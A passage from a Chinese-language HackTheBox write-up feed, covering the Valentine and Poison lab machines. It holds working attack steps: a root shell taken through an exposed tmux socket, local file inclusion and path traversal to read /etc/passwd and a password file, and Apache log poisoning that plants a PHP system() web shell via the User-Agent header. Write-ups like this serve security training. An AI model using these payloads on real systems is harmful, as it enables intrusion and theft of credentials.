&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ssh -i id_rsa hype@10.10.10.79
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_YKN89427OB_hu37679cd126f7edc2c64722b5b4795718_61945_b23bdb569b880fd1640254ed074d608a.webp 400w,
/post/hackbox/valentine/image/image_YKN89427OB_hu37679cd126f7edc2c64722b5b4795718_61945_224209b0693a0da9d74bee98638699b7.webp 760w,
/post/hackbox/valentine/image/image_YKN89427OB_hu37679cd126f7edc2c64722b5b4795718_61945_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_YKN89427OB_hu37679cd126f7edc2c64722b5b4795718_61945_b23bdb569b880fd1640254ed074d608a.webp"
width="722"
height="218"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提示id_rsa权限太大，修改一下密钥文件权限，重新登录&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">chmod &lt;span class="m">500&lt;/span> id_rsa
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_a1zeqqxiSI_hu9121c97497483288f790283e016829ea_77126_7b9648e2362c2b085e38fb9481c08300.webp 400w,
/post/hackbox/valentine/image/image_a1zeqqxiSI_hu9121c97497483288f790283e016829ea_77126_4bc8268f5257ec93afa6db69b1998c9a.webp 760w,
/post/hackbox/valentine/image/image_a1zeqqxiSI_hu9121c97497483288f790283e016829ea_77126_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_a1zeqqxiSI_hu9121c97497483288f790283e016829ea_77126_7b9648e2362c2b085e38fb9481c08300.webp"
width="970"
height="270"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权，&lt;/p>
&lt;p>&lt;code>sudo -l&lt;/code>需要密码&lt;/p>
&lt;p>查看进程信息&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ps -aux &lt;span class="p">|&lt;/span>grep root
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_b2SGspIAhr_hu4a9f18c700c85b36f292f35513e5f0e8_262355_10be09bb832e1308d05de655a29f7592.webp 400w,
/post/hackbox/valentine/image/image_b2SGspIAhr_hu4a9f18c700c85b36f292f35513e5f0e8_262355_63d4146acde78b9bb487e279f261d0a1.webp 760w,
/post/hackbox/valentine/image/image_b2SGspIAhr_hu4a9f18c700c85b36f292f35513e5f0e8_262355_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_b2SGspIAhr_hu4a9f18c700c85b36f292f35513e5f0e8_262355_10be09bb832e1308d05de655a29f7592.webp"
width="1024"
height="553"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现root进程 &lt;code>/usr/bin/tmux -S /.devs/dev_sess&lt;/code>&lt;/p>
&lt;p>&lt;code>tmux&lt;/code>就是一个终端复用器，简单来说就是个终端&lt;/p>
&lt;p>直接执行&lt;code>tmux -S /.devs/dev_sess&lt;/code>，即可获得root shell&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_M8OaFxmJNK_hub04657a51f3e8cda5598c23c5a84b33e_26366_c47f10befdd4b2ac12140bf5a5b62da1.webp 400w,
/post/hackbox/valentine/image/image_M8OaFxmJNK_hub04657a51f3e8cda5598c23c5a84b33e_26366_2b7dd3e0f903e57130faa5a1cafdeab7.webp 760w,
/post/hackbox/valentine/image/image_M8OaFxmJNK_hub04657a51f3e8cda5598c23c5a84b33e_26366_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_M8OaFxmJNK_hub04657a51f3e8cda5598c23c5a84b33e_26366_c47f10befdd4b2ac12140bf5a5b62da1.webp"
width="457"
height="99"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Poison</title><link>https://docs.kaiasec.tk/post/hackbox/poison/</link><pubDate>Fri, 13 May 2022 14:17:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/poison/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -sT -n 10.10.10.84
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_v9hSzPDBuK_hudccef899ff453957aae38545c4aab34c_192044_bec7bda778673d596dfe1d348d192d32.webp 400w,
/post/hackbox/poison/image/image_v9hSzPDBuK_hudccef899ff453957aae38545c4aab34c_192044_6edba5a78cf4490122b27485122b13d8.webp 760w,
/post/hackbox/poison/image/image_v9hSzPDBuK_hudccef899ff453957aae38545c4aab34c_192044_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_v9hSzPDBuK_hudccef899ff453957aae38545c4aab34c_192044_bec7bda778673d596dfe1d348d192d32.webp"
width="860"
height="571"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>80端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_rz38dMNMGc_huc65e8c853ade186b25601083aa8716dd_41933_0dd7be97e357328bb2a835d626157033.webp 400w,
/post/hackbox/poison/image/image_rz38dMNMGc_huc65e8c853ade186b25601083aa8716dd_41933_9db61e13094111bcba0146324f62346d.webp 760w,
/post/hackbox/poison/image/image_rz38dMNMGc_huc65e8c853ade186b25601083aa8716dd_41933_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_rz38dMNMGc_huc65e8c853ade186b25601083aa8716dd_41933_0dd7be97e357328bb2a835d626157033.webp"
width="862"
height="254"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.84/browse.php?file&lt;span class="o">=&lt;/span>phpinfo.php
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_Ngy2DYtA1t_hude2d033e0550634817c3b9d1d0cf9450_115792_1c0e7d4195ee19d950cab6853512a913.webp 400w,
/post/hackbox/poison/image/image_Ngy2DYtA1t_hude2d033e0550634817c3b9d1d0cf9450_115792_2a5c76e60ef644109097d8170c1c9a53.webp 760w,
/post/hackbox/poison/image/image_Ngy2DYtA1t_hude2d033e0550634817c3b9d1d0cf9450_115792_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_Ngy2DYtA1t_hude2d033e0550634817c3b9d1d0cf9450_115792_1c0e7d4195ee19d950cab6853512a913.webp"
width="1194"
height="546"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>查看了下发现&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">allow_url_fopen on
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">allow_url_include off
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#不能远程文件包含，只能看看文件&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.84/browse.php?file&lt;span class="o">=&lt;/span>listfiles.php
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现一个pwdbackup.txt文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_J6ZtuDMCye_hue41ee93c7ccd7fb8933d148da115726c_81543_957ab652dc38db41df7d2408cc94aa5a.webp 400w,
/post/hackbox/poison/image/image_J6ZtuDMCye_hue41ee93c7ccd7fb8933d148da115726c_81543_a3631c7a8b085ba7fe1be9e8acee4d7b.webp 760w,
/post/hackbox/poison/image/image_J6ZtuDMCye_hue41ee93c7ccd7fb8933d148da115726c_81543_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_J6ZtuDMCye_hue41ee93c7ccd7fb8933d148da115726c_81543_957ab652dc38db41df7d2408cc94aa5a.webp"
width="1055"
height="504"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.84/browse.php?file&lt;span class="o">=&lt;/span>pwdbackup.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>居然是密码文件，还提示你解码13次，看起来是base64编码了13次&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_BDLPJmGpCD_hu093f9eee61a3d1eef3ccca7f8931c40e_154530_0df1d8fc71038173ab0b7ae7163f8864.webp 400w,
/post/hackbox/poison/image/image_BDLPJmGpCD_hu093f9eee61a3d1eef3ccca7f8931c40e_154530_f2fb787891a22f6f433d2b4f594f1620.webp 760w,
/post/hackbox/poison/image/image_BDLPJmGpCD_hu093f9eee61a3d1eef3ccca7f8931c40e_154530_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_BDLPJmGpCD_hu093f9eee61a3d1eef3ccca7f8931c40e_154530_0df1d8fc71038173ab0b7ae7163f8864.webp"
width="1204"
height="573"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>解码13次，写个简单脚本&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">base64&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">sys&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">def&lt;/span> &lt;span class="nf">base64_decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">data&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">n&lt;/span>&lt;span class="p">):&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">num&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">0&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">while&lt;/span> &lt;span class="n">num&lt;/span> &lt;span class="o">&amp;lt;&lt;/span> &lt;span class="nb">int&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">n&lt;/span>&lt;span class="p">):&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">data&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">base64&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">b64decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">data&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">num&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">num&lt;/span> &lt;span class="o">+&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">data&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s1">&amp;#39;__main__&amp;#39;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">data&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">n&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">base64_decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">data&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">n&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="n">python3&lt;/span> &lt;span class="n">base64s&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">py&lt;/span> &lt;span class="mi">13&lt;/span> &lt;span class="s1">&amp;#39;data&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_UWYj8hCthj_hu84bac619a4a42a73857797137a96e760_293100_f0d6f41260e67050a897b2602b1351c5.webp 400w,
/post/hackbox/poison/image/image_UWYj8hCthj_hu84bac619a4a42a73857797137a96e760_293100_92d4465a549450a649f6765eff6e07d8.webp 760w,
/post/hackbox/poison/image/image_UWYj8hCthj_hu84bac619a4a42a73857797137a96e760_293100_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_UWYj8hCthj_hu84bac619a4a42a73857797137a96e760_293100_f0d6f41260e67050a897b2602b1351c5.webp"
width="981"
height="792"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>得到密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-text" data-lang="text">&lt;span class="line">&lt;span class="cl">Charix!2#4%6&amp;amp;8(0
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>尝试ssh直接登录root/Charix!2#4%6&amp;amp;8(0，发现密码不正确&lt;/p>
&lt;p>尝试了以下密码都失败&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-text" data-lang="text">&lt;span class="line">&lt;span class="cl">Charix!2#4%6&amp;amp;8(0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">root!2#4%6&amp;amp;8(0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Root!2#4%6&amp;amp;8(0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">ROOT!2#4%6&amp;amp;8(0
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>看一下有什么用户&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">http://10.10.10.84/browse.php?file&lt;span class="o">=&lt;/span>../../../../../../../../../etc/passwd
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_y9gVwQzLXe_huc3c7b9050e9aa5cc547b84dedfeb45c8_186966_13b8272c80dffa9a5cdfbc17c0eca03d.webp 400w,
/post/hackbox/poison/image/image_y9gVwQzLXe_huc3c7b9050e9aa5cc547b84dedfeb45c8_186966_0a84af8bf05ff0371eebff1182366482.webp 760w,
/post/hackbox/poison/image/image_y9gVwQzLXe_huc3c7b9050e9aa5cc547b84dedfeb45c8_186966_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_y9gVwQzLXe_huc3c7b9050e9aa5cc547b84dedfeb45c8_186966_13b8272c80dffa9a5cdfbc17c0eca03d.webp"
width="1197"
height="725"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现用户名charix和，尝试登录charix/Charix!2#4%6&amp;amp;8(0&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ssh charix@10.10.10.84
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录成功，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_YPSJwFUPlh_huf82b9f17f82c428fb94bc28629e453bf_257424_5837b795d4f8a47131631d8e2386209d.webp 400w,
/post/hackbox/poison/image/image_YPSJwFUPlh_huf82b9f17f82c428fb94bc28629e453bf_257424_dc0ff36e5581bffe85eb0fdf5f796cd5.webp 760w,
/post/hackbox/poison/image/image_YPSJwFUPlh_huf82b9f17f82c428fb94bc28629e453bf_257424_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_YPSJwFUPlh_huf82b9f17f82c428fb94bc28629e453bf_257424_5837b795d4f8a47131631d8e2386209d.webp"
width="814"
height="648"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>其他思路: &lt;/p>
&lt;p>思路一：&lt;/p>
&lt;p>LFI+apache日志&lt;/p>
&lt;p>本地文件包含，需要将PHP代码写入服务器文件，并且找到文件路径&lt;/p>
&lt;p>找apache日志访问路径，&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-text" data-lang="text">&lt;span class="line">&lt;span class="cl">https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_XnwrnG4RNl_huec21cd93d383462574b1aaf1a6fd566e_45042_8791ece900239c8b032543be35c6a59d.webp 400w,
/post/hackbox/poison/image/image_XnwrnG4RNl_huec21cd93d383462574b1aaf1a6fd566e_45042_64d605e602c1a981b543ae0d9236bb5f.webp 760w,
/post/hackbox/poison/image/image_XnwrnG4RNl_huec21cd93d383462574b1aaf1a6fd566e_45042_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_XnwrnG4RNl_huec21cd93d383462574b1aaf1a6fd566e_45042_8791ece900239c8b032543be35c6a59d.webp"
width="902"
height="227"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>通过目录穿越访问到apache日志文件，发现记录了User-Agent&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_o1Pz3nI1Ps_hua231c9e96cadf6f2c283f67623909e3d_201698_d1cfc63b0a8cb4f819ad0ac75124892e.webp 400w,
/post/hackbox/poison/image/image_o1Pz3nI1Ps_hua231c9e96cadf6f2c283f67623909e3d_201698_aad4f81eaa269897cade78cd1d88090e.webp 760w,
/post/hackbox/poison/image/image_o1Pz3nI1Ps_hua231c9e96cadf6f2c283f67623909e3d_201698_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_o1Pz3nI1Ps_hua231c9e96cadf6f2c283f67623909e3d_201698_d1cfc63b0a8cb4f819ad0ac75124892e.webp"
width="1415"
height="467"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>通过文件包含执行命令&lt;/p>
&lt;p>发送请求，User-Agent记录在httpd-access.log&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">GET /browse.php?file&lt;span class="o">=&lt;/span>../../../../../../var/log/httpd-access.log HTTP/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host: 10.10.10.84
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">User-Agent: &amp;lt;?php system&lt;span class="o">(&lt;/span>&lt;span class="nv">$_REQUEST&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="s1">&amp;#39;cmd&amp;#39;&lt;/span>&lt;span class="o">])&lt;/span>&lt;span class="p">;&lt;/span> ?&amp;gt;
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept: text/html,application/xhtml+xml,application/xml&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.9,image/webp,*/*&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Language: zh-CN,zh&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8,zh-TW&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.7,zh-HK&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.5,en-US&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.3,en&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.2
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Encoding: gzip, deflate
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Connection: close
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Upgrade-Insecure-Requests: &lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Cache-Control: max-age&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行命令&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">GET /browse.php?file&lt;span class="o">=&lt;/span>../../../../../../var/log/httpd-access.log&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cmd&lt;/span>&lt;span class="o">=&lt;/span>id HTTP/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host: 10.10.10.84
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">User-Agent: &amp;lt;?php system&lt;span class="o">(&lt;/span>&lt;span class="nv">$_REQUEST&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="s1">&amp;#39;cmd&amp;#39;&lt;/span>&lt;span class="o">])&lt;/span>&lt;span class="p">;&lt;/span> ?&amp;gt;
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept: text/html,application/xhtml+xml,application/xml&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.9,image/webp,*/*&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Language: zh-CN,zh&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8,zh-TW&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.7,zh-HK&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.5,en-US&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.3,en&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.2
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Encoding: gzip, deflate
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Connection: close
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Upgrade-Insecure-Requests: &lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Cache-Control: max-age&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_lCGwG85JHh_hu2b45fd7399bf93c1532894433aa3c51d_99108_927be5604c2c75f95fbad8ae79b4d2e1.webp 400w,
/post/hackbox/poison/image/image_lCGwG85JHh_hu2b45fd7399bf93c1532894433aa3c51d_99108_d01a23c1b4337ef972b6a8243865564f.webp 760w,
/post/hackbox/poison/image/image_lCGwG85JHh_hu2b45fd7399bf93c1532894433aa3c51d_99108_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_lCGwG85JHh_hu2b45fd7399bf93c1532894433aa3c51d_99108_927be5604c2c75f95fbad8ae79b4d2e1.webp"
width="1196"
height="547"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这个思路拿到权限用户是www，后门没继续搞下去。&lt;/p>
&lt;p>思路二：LFI+phpinfo条件竞争&lt;/p>
&lt;p>漏洞原理：php上传的临时文件上传到服务器被删除之前(上传的请求结束就删除，所以要让请求的时间更久)，使用文件包含临时文件执行php代码。&lt;/p>
&lt;p>漏洞条件：&lt;/p>
&lt;ul>
&lt;li>能够访问phpinfo路径&lt;/li>
&lt;li>file_uploads on&lt;/li>
&lt;/ul>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_h0_3cKcQx2_hub7c0313855f3809ac77b7c9d41689e78_79230_588a35a5fa75383019867d9621793b97.webp 400w,
/post/hackbox/poison/image/image_h0_3cKcQx2_hub7c0313855f3809ac77b7c9d41689e78_79230_0be38ee6cebee336c1a979fe4066cc50.webp 760w,
/post/hackbox/poison/image/image_h0_3cKcQx2_hub7c0313855f3809ac77b7c9d41689e78_79230_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_h0_3cKcQx2_hub7c0313855f3809ac77b7c9d41689e78_79230_588a35a5fa75383019867d9621793b97.webp"
width="1007"
height="512"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>参考：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>脚本地址&lt;/p>
